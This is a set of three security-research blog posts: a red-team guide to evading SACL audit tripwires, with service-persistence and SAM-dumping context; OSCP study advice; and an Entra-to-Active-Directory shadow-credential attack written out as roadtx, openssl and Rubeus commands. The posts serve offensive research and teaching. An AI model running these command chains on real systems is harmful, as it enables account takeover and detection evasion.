For demo purposes, I am running a simple Windows environment with a single workstation and domain controller (DC). For my command and control (C2) framework, I am using the Mythic framework with a Merlin agent running on the workstation. In this case, the agent runs under the context of an elevated user to show the output. Also, forewarning, I will not be covering covert techniques themselves but rather a down-the-middle use case to focus on the tool and output itself.

Alright; now that the background, summary, and requirements are complete, let’s get into the simple demos. We will start with the registry. There is so much information available to us in the registry that we are almost guaranteed to interact with it in some way during an assessment, whether it is intentional or not. But where do we want to start our testing to see which important registry (sub)keys defenders might be watching? Thankfully, one of my defensive cohorts, Luke Paine, already made a sample list in his post of The Defender’s Guide — The Defender’s Guide to the Windows Registry. Included in his detailed coverage of registry SACLs, he provided a .csv file with a list of keys and the registry operation to watch: Highly Targeted Registry Keys.csv. Let’s start with a few items in this list to test our SACL setup in a lab.

The following few pictures show the setup of the audit policies and SACLs so we can conduct testing. If you are unfamiliar with setting this up, you can think of it as a little guide to setting SACLs in your environment. First, for our local host, we go into Local Security Policy, then Local Policies > Audit Policy, and ensure that Audit object access is enabled (Figure 1).

Next, we can start setting up some SACLs. We will use the HKLM\SYSTEM\CurrentControlSet\Services registry key referenced in the Defender’s Guide. For simplicity, open regedit.exe, browse to the key, right-click, and select Permissions (Figure 2).

Select “Advanced” in the security permissions window (Figure 3).

Next, select auditing. If you are unfamiliar with the basic setup of the advanced security window, the permissions tab will show and set DACLs, auditing handles SACLs, and effective access is, as it sounds, testing the access of the account you ask it. In my case, you will see that I have set a SACL to audit anyone in Authenticated Users accessing this registry key (Figure 4).

If we select the SACL, we can see the principal again; the type is set to success auditing, applies to this key and subkeys (inheritance set), and audits on Set Value and Create Subkey (Figure 5).

Now that we have our test SACLs set, we can pick a service to modify and ensure it works. In my case, I went with the OneSyncSvc and decided to change the ImagePath to set up some simple persistence (Figure 6).

Before we start the SACL testing, we open the Windows Event Viewer, navigate to Windows Logs > Security, and set a filter on Windows event ID (EID) 4663: “An attempt was made to access an object” (Figure 7). I just cleared them up to make sure we have a fresh list.

In our elevated Merlin agent, we use a simple run sc config command to modify the binPath of the service OneSyncSvc to instead point to a payload (Figure 8).

After the command, we can double-check that the service changed by refreshing our regedit and see that the ImagePath has changed for OneSyncSvc (Figure 9).

In Event Viewer, we now have a new EID 4663 (i.e., “An attempt was made to access an object”) stating that NT AUTHORITY/SYSTEM accessed the registry key HKLM\SYSTEM\CurrentControlSet\Services\OneSyncSvc (Figure 10). This event is our expected result since we had the SACL set to audit any access and inherit it from Services, so we catch modifications on all services. Opening the event, we see that the requested access was Set key value, corresponding to our modification (Figure 11).

We can double-check things like this ahead of time to prevent tripping the SACL with this simple SACL_Scanner tool. It works with execute_pe (and Octoberfest7’s inline-execute-pe). Running this tool with the “-r” flag followed by the key we want to target will give us the desired information. It will scan the entire hive if we target a hive itself (HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER). We check whether an item has any SACLs, if it is a direct or inherited SACL, and the SACL info we desire to let us know what is being audited (Figure 12). Now, depending on how the SACL is set up, this is not full proof to check without being detected, but I will go into further details on this in the detection section.

Now, let’s check OneSyncSvc directly. It tells us there is a SACL applied to the key but does not give us details on it (Figure 13). This is intentional since it is an inherited SACL. It will display direct SACLs when requested, but inherited SACLs will only display when the verbose flag (-v) is added so we do not get too much information when scanning multiple items.

Rerunning the command with the “-v” flag gives us the complete information we want and some additional security identifier (SID) information (Figure 14).

Adding the “-opsec” flag allows us to run an additional check to determine if the SIDs within the SACL match any SIDs applied to our current access token. We can see that we have a detected match in this case, which lets us know that we should avoid modifying this registry key further, or we would trip the SACL (Figure 15). Note: a known limitation of this is that the tool compares the SIDs in the access token to the SACL, which means any nested groups that would not be added to the access token will not come back as detected since we are not unrolling groups here.

Now, let’s check the SAM SACL to see if dumping the SAM would get us burned. We can start by setting a SACL on HKLM\SAM with the same steps. When we try to access a key under HKLM\SAM, an event log lets us know someone has tried to access those keys (Figure 16).

When checking HKEY_LOCAL_MACHINE\SAM with SACL_Scanner, we get the info we want to see, letting us know there is a SACL set and that we should avoid dumping the SAM (Figure 17).

I will run through some of the other flags pretty quickly as they should be understood pretty easily. Using the “-f” flag followed by a file on the host or share will similarly check the SACLs (Figure 18).

Next, we can use “-d” to instead feed it a directory to check the files therein. Notice that we have multiple files here and only one has SACLs applied (Figure 19). Sometimes we can judge based on names and settings. In our example below, we can see that there is a SACL directly applied to my tongue-in-cheek mock honeypot file to alert on reading the file; however, the server_PWs.txt file right above it has none. We can infer that I might not want to touch the more tempting file if I can avoid it.

If we throw the “-opsec” flag into the directory listing, we first check the directory itself to see if we should list files. If we trip a SACL while enumerating file SACLs, we will skip it (Figure 20). This check is nice with a targeted directory but even more important when we use just “-d” without a supplied directory, which will scan the entire C:\ drive.

Also, while I have not seen it much, we can scan services with “-s.” The flag by itself will check all services, or we can add a specific service to target (Figure 21).

Now, on to some AD checks. We start by ensuring the Audit Policy on the domain controller has “Audit directory service objects” enabled (Figure 22). We do not necessarily need it for our SACL checks, but it is good to include it if anyone needs the extra step to help turn on SACL eventing.

As I stated earlier in the post, the major blocker in reading the AD SACLs is simply having the privilege to read the SACLs objects. I know it’s a bit counterproductive and, sadly, this means that we cannot collect them like we do DACLs with a tool like SharpHound. As such, it will likely be of better use if you try to establish domain persistence versus finding an attack path to rise to the top. The flags should make sense based on what we covered. We add the “-a” flag to target AD followed by the “LDAP://{distinguished name}” of the object we want to target. Adding the “-opsec” flag will again check our SIDs to see if we would trip the SACL, and there is a hash map (the reason the file is a bit big) with the GUIDs mapped to user object class attributes. In our case below, we can see that there is a SACL applied to specterDA, which will trigger on writing to the msDS-KeyCredentialLink attribute (Figure 23). If we have not done shadow credentials so far during our assessment, we know we should not try to do that as our persistence on this DA account.

While the hash map covers those user object class attributes, we can still obtain the SACLs on other objects, like the data protection API (DPAPI) domain backup key. Running the scanner targeting that in my little test lab provides a sample output of no SACLs applied, so we should be fine in a SACL sense to backup that key and do what we need to from there (Figure 24).

Detections

When dealing with SACLs, there will be some fallibility in interacting with a securable object to get the information. The SACLs I commonly see on objects are auditing either modifications of an object or reading the data in a file or registry key. The event log this generates on a host is EID 4663 (i.e., “An attempt was made to access an object”). While this event is the primary log SACL_Scanner is designed to identify in the hope of avoiding generating it, you can use additional logs to detect the tool. For example, we can use EID 4656 (i.e., “A handle to an object was requested”) to get the precursor information to EID 4663. We will still need to obtain the handle to interact with it and read the permissions when reading the object information. We can add “Read Permissions” or “Read Attributes” checks to the SACL to identify SACL_Scanner obtaining the handle to read the SACLs (Figure 25). There are pros and cons to this, as with anything in security, as adding these checks to the SACL will create many more events as standard Windows programs like explorer.exe do their essential functions.

Similarly, in AD, we try to avoid writing the wrong properties by identifying them first, but other SACLs can detect our access attempts. By setting SACLs on reading object properties, specifically the Public-Information property set’s Object-Class attribute containing the NT-Security-Descriptor, we can detect SACL_Scanner looking at the SACLs on an AD object. We can see the GUIDs in an EID 4662 log, showing that we are reading those properties (Figure 26) and comparing them to the Microsoft documentation (Figure 27 and Figure 28). Auditing reading AD objects will generate an immense amount of traffic, so going that route will need to be severely tuned to gain any real value from it.

I am not a detection engineer, but to help with this I have made a basic Sigma rule that should help with detecting this tool and hopefully similar techniques.

That’s all for today. I hope this gives you a deeper understanding of how defenders are leveraging SACLs to detect unauthorized access attempts and how you can use SACL_Scanner to adapt your tradecraft accordingly. By being aware of these audit tripwires, you can fine-tune your enumeration, privilege escalation, and other techniques to remain stealthy.

Remember, effective red teaming isn’t just about bypassing defenses — it’s about continuously evolving alongside them. Stay proactive in researching new detection mechanisms, refining your OPSEC, and understanding the blue team’s perspective.

Until next time, stay sharp and tread carefully.

Don’t Touch That Object! Finding SACL Tripwires During Red Team Ops was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

Getting the Most Value Out of the OSCP: Pre-Course Prep

The first post in a five-part practical guide series on maximizing the professional, educational, and financial value of the OffSec certification pursuit for a successful career in offensive cybersecurity consulting

Disclaimer:

All opinions expressed in this article are solely my own. I have reviewed the content to ensure compliance with OffSec’s copyright policies and agreements. I have not been sponsored or incentivized in any way to recommend or oppose any resources mentioned in this article.

Introduction

Love it or hate it, the Offensive Security Certified Professional (OSCP) remains a significant hurdle for many aspiring offensive security consulting professionals. While the course and exam offer undeniable educational value, I believe there are underappreciated practical steps students can take during their “OSCP journey” to strengthen their candidacy and develop the essential soft and technical skills needed for success in the field. In this post (hopefully the first of a small series), I’ll explore three pieces of practical advice for students to consider before enrolling in the course. In future posts, I hope to explore more advice tailored to distinct phases of the OSCP journey.

PEN-200: Penetration Testing Certification with Kali Linux | OffSec

A Little Bit About Me

I am an associate consultant in the offensive security consulting industry, having successfully transitioned from a career as a software engineer in information technology (IT). While my background in offensive security consulting is still growing, I feel that my recent experience as a student trying to earn the OSCP certification (or, as I like to call them, “OSCP-hopefuls”) and my successful pivot into this field have provided me with valuable insights to share on this topic.

Some Background Context

The OSCP is a popular cybersecurity certification that tests an individual’s ability to identify, exploit, and report on misconfigurations/vulnerabilities affecting web applications, common network services, and the Linux and Windows operating systems. Maintained by OffSec (formerly Offensive Security), the certification stands out due to its rigorous exam, which requires candidates to complete a 24-hour practical black-box penetration testing scenario. Students are given an additional 24 hours to write and submit a report for grading. To earn the OSCP, candidates must successfully exfiltrate a minimum number of “flags” and submit a satisfactory report.

Infosec & Cybersecurity Training | OffSec

Employers widely recognize the OSCP as a valuable credential for entry-level roles in the offensive security consulting industry, which includes cybersecurity services like penetration tests, red team engagements, and purple team exercises. Its frequent appearance in job postings (which has earned it the joking moniker, “the LSAT for hackers”) and the challenging nature of the exam for junior ethical hackers make it a significant milestone. As a result, it’s common for students who pass the exam to altruistically share their experience in OSCP journey articles, offering insights to others who are on the same path, detailing what they studied, how they approached the exam, and their personal takeaways.

I was originally going to write my own article following this same prototype, but recent developments led me to reconsider. Although I passed the exam in March 2024, the OSCP exam underwent a significant format change in September 2024. Given these changes, I felt that a “review” of my OSCP journey would likely be outdated.

So Why Are You Writing This?

While I consider the OSCP a strong addition to my resume, I’ve found that much of the “value” I gained from the pursuit of the OSCP — value I’ve leveraged during job applications and in my current role— came from unexpected places. As it turns out, the OSCP journey is just as important, if not more so, than the credential itself. With that in mind, I felt compelled to share specific details of my OSCP experience, the lessons that served me well, and the actions I would take if I could go back and do it all over again.

If you look at the bulk of OSCP-related content online, it’s clear that the focus is overwhelmingly on developing the technical mastery needed to pass the exam. While this focus is understandably important, it overlooks the broader picture. The exam itself, along with the technical content required to pass it, offers valuable lessons, but they’re just one part of the overall journey that can contribute to a thriving career in offensive security.

This article aims to fill that gap by offering practical advice that students can follow to not only pass the OSCP but also to grow into well-rounded penetration testers. Some of this advice may be considered “extra mile” exercises, while others are proactive steps that can be employed more passively. Regardless, all of them are designed to help candidates maximize the professional, personal, and financial value of earning an OSCP certification.

A Few Disclaimers Before We Dive In:

• Article Structure: Due to the length of my original draft, I decided to split this post into a five-part series representing each “phase” of the OSCP journey: 1) pre-course preparation, 2) during the course, 3) during the labs, 4) during the exam, and 5) after the exam (pass or fail)
• Target Audience: While the primary audience for this article is for students hoping to break into the offensive security consulting industry, I do not mean to discount or exclude individuals who have already secured a consultant role or are pursuing the OSCP for other reasons such as personal enrichment or workplace/regulatory compliance (luckily, I believe much of my advice still generally applies to these individuals)
• Not an Endorsement: This article is not an endorsement of the OSCP itself (at various points in this series, I will submit what I believe to be valid but fair criticism of the credential), but rather a vehicle to share insights from my personal experience with the certification
• No Guarantees: I cannot promise that students who follow this advice will pass the OSCP exam or successfully pivot into the offensive security consulting industry
• Other Paths are Valid: The OSCP is not a gatekeeper to the offensive security consulting industry (I know many junior to senior-level experts without the credential) and I would advise students to consider every path to a successful and fulfilling career before committing to the certification program

Before the Course…

“By failing to prepare, you are preparing to fail.” - Benjamin Franklin

Let’s start with advice that applies to students who are either considering enrolling in the PEN-200 course or are actively planning to. If you could walk away from this article with just three takeaways, here they are:

1. Estimate whether the return on investment (ROI) will be positive or negative before committing to enrollment, and explore ways to reduce upfront costs
2. If you’re preparing for the PEN-200 with external training, complete the training before enrolling and use that time to build your resume with practical and challenging achievements
3. Start creating a reference guide (AKA a “command cheat sheet”) early to improve your testing efficiency and become more familiar with common offensive security tools

Consider the ROI

The OSCP is undeniably an expensive certification program. Given the steep financial and time commitments, one must consider whether the tangible and intangible benefits of the program represent a net-positive, neutral, or net-negative ROI relative to the candidate’s career goals and personal circumstances.

At the time of this article, the base cost of the OSCP certification starts at $1,749, which includes 90 days of access to the online course, lab materials, and a single exam attempt. However, a more realistic estimate — factoring in multiple exam attempts and lab extensions — can easily exceed $2,000. Individual exam retakes cost $250 each, while 30-day lab extensions cost $360 apiece. Additionally, many students choose to invest in external training resources, each with its own associated costs (more on that later). For those seeking an extended study period and additional benefits, the LearnOne subscription offers a year of course and lab access, two exam attempts, and other perks for $2,749/year.

Individual Pricing | OffSec

Additionally, studying for the OSCP is a significant time investment, and failed exam attempts include mandatory cooldown periods that can further extend the overall timeline and costs. While everyone progresses through the PEN-200 course and labs at their own pace, the most effective approach is often a marathon pace, not a sprint. If you’re under a strict time constraint or primarily seeking quick, incremental resume boosters, the OSCP may not align with your current goals.

The OSCP is also not the only practical ethical hacking certification program available, many of which are more cost-effective. Some of these courses cover material that is not included in the PEN-200 course but is arguably critical knowledge in the offensive security consulting industry, such as command and control (C2) frameworks and their infrastructure, antivirus (AV) evasion techniques, and more sophisticated web application and Active Directory (AD) attack vectors. While my personal experience is limited to Zero Point Security’s Certified Red Team Operator (CRTO) certification, I’ve heard positive reviews of the Hack the Box Certified Penetration Testing Specialist (HTB CPTS) and Practical Network Penetration Tester (PNPT) credentials. These programs are comparable in difficulty and scope to the OSCP and, perhaps most notably, are currently below $500, making them a more affordable alternative to the OSCP.

Security Certification Roadmap - Paul Jerimy Media

It should also be noted that certification programs are just one of many pathways to a career in offensive security consulting. While they are often a key metric technical recruiters use to assess candidates, other accomplishments — such as independent ethical hacking projects, competitive tournaments, or content creation — can carry equal or even greater weight on an application. These alternative routes showcase not only technical expertise but also initiative, creativity, and passion for cybersecurity, most of which come at a much lower upfront cost.

Still, there are notable benefits to pursuing the OSCP. The PEN-200 course encompasses an impressive breadth of penetration testing knowledge and the exam itself is notoriously challenging. Considering this, the OSCP has earned a well-deserved reputation as a litmus test for prospective consultants and technical recruiters therefore eagerly seek OSCP-certified candidates. Additionally, the certification has been around for a relatively long time and has strong name-brand recognition in the industry. Finally, it includes an impressive set of lab networks for students to practically apply the technical skills learned during the course to an environment composed of intentionally vulnerable machines. This aspect in particular provides a well-defined path to an audience — mostly composed of entry-level ethical hackers — from beginner to professional-level penetration testing mastery.

There are also pragmatic reasons to pursue the OSCP. Although I don’t have specific metrics to support my claim, my anecdotal experience in the job market suggests that many organizations incorporate the OSCP in their hiring process. Some firms require candidates to hold the certification, model their technical interviews after the exam, or mandate new hires to earn the credential within a specified time frame. Earning the OSCP early in your job search could therefore open up more doors for you professionally. Moreover, if your next role represents a significant increase in base income, the associated costs of the OSCP may be offset relatively quickly.

One straightforward way to increase the ROI of an OSCP investment is to reduce the upfront cost associated with the bundle. For currently enrolled university students, OffSec offers a 10% discount on a LearnOne subscription through its Achieve financing program. OffSec has also historically held an annual sale on LearnOne subscriptions during November through January. Beyond OffSec, many nonprofits offer partial or complete discounts for common certification programs — including the OSCP — to successful applicants of scholarship programs. Many companies also provide professional development benefits, which can cover the cost of an OSCP voucher. This is especially common among cybersecurity consulting firms and serves as a compelling argument in favor of waiting until after securing a new position before enrolling in the PEN-200.

Discount Programs | OffSec

In summary, the OSCP is a significant financial investment and prospective students should not take it lightly. For many, it represents a major milestone in their ethical hacking journey, a source of personal growth, and a pathway to a new career. For others, its benefits may only be marginal or, depending on the circumstances, not in their best interests. Ultimately, the decision rests with the individual, who should weigh all the factors and considerations to determine if the OSCP is the right choice for them.

Build Your Resume While You Study

While the course provides robust hands-on training, many OSCP-hopefuls — including myself — supplement their PEN-200 training with additional resources to enhance their learning experience. By strategically choosing training options, you can not only deepen your technical knowledge but also strengthen your resume or CV, making your study efforts even more rewarding.

The official OffSec motto is “Try Harder”, which essentially means that successful problem solvers are persistent, creative, and open to new ideas. At the risk of sounding arrogant, I’d suggest adding another adjective to the mix: “retrospective”. Penetration testers and others who face recurring challenges throughout their careers are more likely to succeed if they can learn from past experiences and apply those lessons to current problems. External training, then, is a natural extension of the Try Harder mindset. It’s also prudent, since we can deliberately select exercises we can showcase on a resume, reference in cover letters, or leverage using the STAR method during behavioral interviews.

Generally, I recommend completing external resources before enrolling in PEN-200 for two reasons. First, supplemental training establishes a solid foundation in both theoretical knowledge and practical experience with tactics, techniques, and procedures (TTPs) before starting the course. Although PEN-200 assumes no prior experience in ethical hacking, having a baseline understanding of key concepts can make the course more manageable and improve your efficiency. Second, when you purchase a course and exam voucher, your access to the online course material and lab networks is automatically activated, and the expiration date is set. If you complete the course and labs before your access expires but still require additional training, any time spent on external resources during this period could have been used to take full advantage of OffSec’s official resources (such as reviewing the course material or writing reports on the lab networks, which I will discuss later in the series). Finishing most or all of your external training before starting PEN-200 ensures you aren’t wasting the expensive time you paid for by focusing on extrinsic resources.

Take full advantage of the low-pressure environment of external training by experimenting with different commands, refining your assessment methodology (more on that later in the series), and discovering which technology stack you enjoy hacking the most. Platforms like Hack the Box (HTB) and OffSec’s Proving Grounds are perfect for this. You may even pick up knowledge that isn’t covered in the PEN-200, giving you a potential edge when applying for jobs and helping you stand out as a candidate. Additionally, many external training platforms have active communities where learners can collaborate, share insights, and support each other. Building connections within these communities can provide valuable peer feedback, challenge your assumptions, and give you a sense of camaraderie as you navigate the complexities of penetration testing.

In conclusion, practical supplemental training offers the dual benefit of preparing you for the challenging PEN-200 course while strengthening your profile as a candidate for offensive security consulting roles. Below, I have included a table of my personal recommendations for practical training resources, including their costs, the types of challenges they offer, and how they can enhance your job application. I have focused primarily on resources that I have personally used and are affordable, keeping in mind our previous discussion on ROI.

Begin Writing a Reference Guide

A reference guide is essentially a structure where consultants store key information they need to recall during engagements, such as command syntax or the requirements to launch a specific attack — essentially a “cheat sheet”. Not only is this type of resource valuable for the OSCP labs and exam, but it can also be an asset during a live engagement or published as a personal project that can be included on a job application.

I personally find command reference guides incredibly useful in both simulated training environments and live engagements. A well-organized, personalized reference guide not only improves your efficiency but also reinforces your assessment methodology, core-concept understanding, and technical writing abilities. Think of your guide as a living document that evolves alongside your growth as an ethical hacker, serving as a modular and reliable resource. Starting your reference guide early— even before beginning the PEN-200 course —can significantly enhance your testing efficiency and tool expertise.

A reference guide can arguably be started at any point in the OSCP journey, but I chose to include it in the “Pre-Course” section for multiple reasons. First, the guide should ideally transcend the OSCP and be useful for any ethical hacking project, so it makes sense to include it in one of the sections separate from the PEN-200 material. Second, if the student intends to pursue external training resources, they are bound to encounter useful tools before starting the course, making it prudent to document their usage. Finally, maintaining a reference guide is a continuous process, so I would like to get students in the habit of writing reference guides early as opposed to much later in the OSCP journey.

My favorite tool for creating reference guides is Obsidian, a free and cross-platform node-based note-taking utility. It offers a rich set of features, including an interactive graph, Markdown language support, a tagging system, and much more. Other node-based programs worth considering are Microsoft OneNote, Standard Notes, and CherryTree.

Obsidian - Sharpen your thinking

Let’s take impacket-GetUserSPNs as an example. This tool is part of Fortra’s Impacket suite and is based on the original GetUserSPNs.py module. It automates the “Kerberoasting” attack, which allows attackers to retrieve the password hash of a service account in an AD environment.

impacket/examples/GetUserSPNs.py at master · fortra/impacket

If we were writing a page for this tool in Obsidian, we could start with an overview section. This would include a link to the source code for the tool, as well as the MITRE ATT&CK framework page for Kerberoasting.

Next, we need to define the requirements necessary for this attack to be feasible. In this case, we should note that the attacker needs access to a valid credential set in AD and that the target user(s) must be a service account associated with a Service Principal Name (SPN). Additionally, it’s important to mention that this tool can be executed remotely from the attacker’s Linux machine on the same network, as some tools require execution on a victim’s Windows machine or through a C2 framework like Cobalt Strike. If verifying the feasibility of an attack requires additional tools, we can create links to other Obsidian pages and embed them here.

Next, we should include some command examples. Tools like impacket-GetUserSPNs often have many different command-line arguments and optional flags, so it’s best to prioritize the ones most relevant to you and omit the others.

Although it is considered [mostly] out of scope of the PEN-200 course, I still recommend including a section discussing how to enhance the “stealth” of a given command and thwart operational security (OPSEC) efforts. This is a critical topic in offensive security consulting and could help you stand out among other job candidates (a candidate who can demonstrate both technical aptitude with a given tool and how to use it stealthily is more desirable than one who only knows the former). While Kerberoasting is generally considered an “OPSEC-loud” technique, we will do our best to evade detection and explain our efforts in the OPSEC section. If you’re unsure whether a TTP can be made stealthier, consider researching it on resources like HackTricks or revisit this section later.

Finally, we will want to include the output from the command’s help menu (impacket-GetUserSPNs --help ).

If we wanted to go a step further, we could include an in-depth analysis of what happens “under the hood” when executing a typical Kerberoasting command. This would involve screenshots of the impacket-GetUserSPNs source code and network packets that Wireshark captured in a personal lab (more on this later in the series). Additionally, we could use Obsidian’s tagging system to link this page to a “kerberoasting” tag, unifying all other tools related to the Kerberoasting technique.

On a final note, a reference guide can serve multiple purposes depending on how you design it. A personalized guide — tailored to your study habits, tools, and workflow — can significantly improve your efficiency during exams or live engagements by helping you quickly locate critical information. If you’re like me and struggle with staying organized during an assessment, structuring your guide around an adversary emulation framework (e.g., the MITRE ATT&CK Framework, Lockheed Martin’s Cyber Kill Chain, and Mandiant’s Targeted Attack Lifecycle) can support a systematic approach to problem solving. In any case, it is best to start writing your own guide early and continue building it as you progress on your ethical hacking journey.

Conclusion

I hope you enjoyed the first post in this series. If you have any comments, criticisms, or advice you think should have been included, please feel free to leave a comment. In the next post, I’ll explore additional advice for students as they begin reading the official PEN-200 course materials.

Getting the Most Value out of the OSCP: Pre-Course Prep was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

This is part one in a two (maybe three…) part series regarding attacker tradecraft around the syncing mechanics between Active Directory and Entra. This first blog post is a short one, and demonstrates how complete control of an Entra user is equal to compromise of the on-premises user. For the entire blog series the point I am trying to make is this:

The Entra Tenant is the trust boundary

That means that if your tenant consists of 100 domains, a compromise of one domain is likely to equal a compromise in all other domains, assuming line of sight to the targeted domain.

Intro to Entra Connect Sync

Entra Connect Sync is the software responsible for propagating changes between Active Directory and Entra (often still referred to as Azure Active Directory). For most cases, the changes are propagated from Active Directory to Entra. As a quick example, consider a new user created in an on-premises Active Directory. The next time Entra Connect Sync runs a sync cycle, a special Entra sync account will send a provisioning message to adminwebservice.onmicrosoft.com to create a new Entra user that represents that user. This process has been covered very well and tooling exists to manipulate this syncing mechanic in AADInternals. An interesting, and fairly unexplored, part of this mechanic is the “metaverse” within Entra Connect.

The metaverse is a virtual representation of multiple data sources. Think of it like a conflict manager for directories. Each data source (AD and Entra) are called “connected directories”. The connected directories are enumerated via remote protocol (LDAP, https, etc.) by a connected directory specific “connector”. Each connected directory has a virtual representation called a “connector space” that represents all of the desired data synced from the connected directory. Once a connected directory runs an “import”, all of the users/devices/groups/etc. exist in the connector space. After import, a synchronization is executed and the connector space objects are “projected” into the metaverse.

The metaverse object is the aggregation of all associated properties from multiple connected directories. Since this is an abundance of lingo, let’s walk through an example. In Active Directory, I’m going to create a user named “jack.burton@hybrid.hotnops.com”. Once the user is created, we run a “delta import” in the Synchronization Service

As you can see, we have one “Add” and the user Jack Burton now exists in the connector space, but not the Metaverse yet.

In order for the Jack Burton user to be projected into the metaverse, we need to run a sync. In this case, I’ll run a delta sync.

Clicking on the “Projections” link, we can see that a new user has been projected into the Metaverse.

There is also a new export attribute flow, which indicates that this user is to be provisioned to another connected directory (Entra). To trigger this provision, we lastly need to run an export on the Entra connector space.

Don’t worry about the export errors, I have been doing stuff. At this point, we have an end to end flow of an object being created in AD, projected into the metaverse, and then provisioned in Entra. But from the Entra Connect standpoint, there’s no special differentiator between Entra and Active Directory, they are both simply connector spaces.

So can attributes go from Entra to Active Directory?

Yes!

The flow of attributes are specified by the Entra Connect rules, which have a default setup that I will speak to in the next blog post. By default, there is one and only one attribute that is written from an Entra user to an Active Directory user and that is the searchableDeviceKey -> msDS-KeyCredentialLink attribute flow. If msDS-KeyCredentialLink sounds familiar, it’s because it has been covered extensively as an abuse primitive known as “Shadow Credentials”. Long story short, if we can add a public key to the msDS-KeyCredentialLink attribute of a user, we can obtain a TGT for that user with the private key. This means that if we can add a key to an Entra user, we can authenticate as them on-premises. This will prove to be a powerful primitive in the following blog posts when we do a deeper dive on Metaverse and cross domain attacks.

Abusing the WHFB key to gain access to on-premises account

Any key material (Window Hello For Buiness or FIDO2) key that is added to an Entra user will be synced down to the on-premises user to the msDS-KeyCredentialLink attribute. To perform this attack, we are assuming complete control of an Entra user account. This includes plaintext password and access to MFA methods. We will try to ease these assumptions later, but for now I simply want to prove-out the idea.

Here are the following commands that we can run to get an msDS-KeyCredentialLink set on the on premises user. As a high level overview, we are going to be registering a WHFB key. We could also do a FIDO2 key in theory, but this will be easier for demonstration. This attack, at the moment, requires knowledge of the plaintext password and possession of at least one MFA authenticator. To register a WHFB key, we are going to create a fake device, obtain a PRT, and enrich it with an ngcmfa claim. A lot of the heavy lifting for this has already been done by Dirjkan in the roadtools toolkit. The steps are as follows:

Obtain a token for the enterprise device registration resource server

roadtx auth -r urn:ms-drs:enterpriseregistration.windows.net - device-code

We need a token bound to a device identity, which means we need to register a new device and obtain a Primary Refresh Token

roadtx device -a register
roadtx prt -c .\devicel.pem -k .\devicel.key -u jack.burton@hybrid.hotnops.com -p its@llInTH3rEFLEXez

In order to add a WHFB key, we need a token with an MFA claim within the past ten minutes, so we need to “enrich” the PRT

roadtx prtenrich - prt $PRT - prt-sessionkey $SESSION_KEY - ngcmfa-drs-auth - tokens-stdout -u jack.burton@hybrid.hotnops.com

Lastly, add a WHFB key

roadtx winhello –access-token <token from previous step>

At this point, we have added a WHFB key to the Entra user and now need to wait up to 30 minutes for it to sync down to the on-premises user. For the sake of this writeup, I can manually trigger the sync, but note that this is not a normal order of operations for Entra Connect sync. In this image, we can see that a new property has been ingested into the Entra connector space.

The delta sync shows that the updated property has been projected onto the joined user in the metaverse.

Lastly, the export shows that the msDS-KeyCredentialLink has been provisioned to the Active Directory user, as shown in the msDS-KeyCredentialLink row.

We have shown that an attacker can add a public key to the msDS-KeyCredentialLink property, but now what?

We need to do some massaging with the key material to obtain a TGT for jack.burton.

First, we need to create a certificate signing request with the key we registered above

openssl req -new -key .\winhello.key -out .\winhello_cert_req.csr

Second, we need to sign the CSR

openssl x509 -req -days 365 -in .\winhello_cert_req.csr -signkey .\winhello.key -out .\winhello_cert.pem

Lastly, bundle it in a PCKS12 file

openssl pkcs12 -export -out jack_burton.pfx -inkey .\winhello.key -in .\winhello_cert.pem

Now we can use the PFX file with common tools like Rubeus

.\Rubeus.exe asktgt /user:jack.burton /certificate:C:\keys\jack_burton.pfx /password:"pfxPassword" /domain:hybrid.hotnops.com /dc:DC1-HYBRID.hybrid.hotnops.com /getcredentials /show

And there you have it, we obtained a TGT for a user by actions we took on the Entra side. You may be wondering

“If we have the user plaintext password, why would we need or even want to do this?”

I have three answers:

1. In the event that an attacker has the ability to modify a user password in Entra when password writeback is disabled, this will enable them to access the account on-premises.
2. The primitive of adding a key to a user may not necessarily require a password or access to an MFA authenticator. I am currently in search of better ways to do this, and I suspect that there are many ways to achieve the same result.
3. The primitive of adding a key to an Entra user will serve as a foundation for the cross domain attacks we will perform in the next two parts of this blog series. In many cases, we control the user, password, and MFA authenticators.

References

https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab

https://dirkjanm.io/lateral-movement-and-hash-dumping-with-temporary-access-passes-microsoft-entra/

https://aadinternals.com/talks/Attacking%20Azure%20AD%20by%20abusing%20Synchronisation%20API.pdf

https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/concept-azure-ad-connect-sync-architecture

Attacking Entra Metaverse: Part 1 was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.